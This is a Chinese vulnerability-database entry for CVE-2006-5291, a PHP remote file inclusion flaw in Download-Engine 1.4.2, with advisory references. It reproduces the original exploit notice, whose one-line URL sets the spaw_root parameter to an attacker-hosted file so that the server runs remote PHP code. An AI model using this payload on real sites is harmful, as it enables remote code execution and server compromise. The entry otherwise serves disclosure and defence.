Alex DownloadEngine 'admin/includes/spaw/spaw_control.class.ph' Spaw_Root参数远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193203 漏洞类型 代码注入
发布时间 2006-10-16 更新时间 2006-11-30
CVE编号 CVE-2006-5291 CNNVD-ID CNNVD-200610-220
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006100087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-220
|漏洞详情
Download-Engine1.4.2的admin/includes/spaw/spaw_control.class.php存在PHP远程文件包含漏洞,远程攻击者可借助spaw_root参数中的URL执行任意PHP代码。
|漏洞EXP
#=======================================================================
===============
#  Download-Engine Remote File Include                                                                                                                                          
#=======================================================================
===============
# Info:-														
#														
# Scripts: Download-Engine												
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEs
essID=4754ee8243de5f333ec74272f249b649  
# Version : 1.4.2													
# Dork & vuln : download scripts and think :)										
# Note : only this version effcted :)											
#=======================================================================
===============
#Exploit :													
#														
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_r
oot=http://EvElCoDe.txt?			              
#														
#=======================================================================
===============
#Discoverd By : v1per-haCker											
#														
#Conatact : v1per-hacker[at]hotmail.com										
#														
#XP10_hackEr Team												
#														
#Greetz to : 													
#abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |  ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | metoovet	
#                 													
#	     													
#And All Members In XP10_hackEr Team										
#Thanx to str0ke :)												
#						[WWW.XP10.COM]							
#=======================================================================
===============
|参考资料

来源:XF
名称:downloadengine-spaw-file-include(29493)
链接:http://xforce.iss.net/xforce/xfdb/29493
来源:BID
名称:20500
链接:http://www.securityfocus.com/bid/20500
来源:BUGTRAQ
名称:20061012Download-EngineRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/448450/100/0/threaded
来源:MILW0RM
名称:2521
链接:http://www.milw0rm.com/exploits/2521
来源:VUPEN
名称:ADV-2006-4025
链接:http://www.frsirt.com/english/advisories/2006/4025
来源:MISC
链接:http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.25&r2=1.26
来源:MISC
链接:http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.19&r2=1.20
来源:spaw.cvs.sourceforge.net
链接:http://spaw.cvs.sourceforge.net/spaw/spaw/docs/ChangeLog.txt?view=markup
来源:SECUNIA
名称:22383
链接:http://secunia.com/advisories/22383
来源:SREASON
名称:1723
链接:http://securityreason.com/securityalert/1723
来源:MILW0RM
名称:2521
链接:http://milw0rm.com/exploits/2521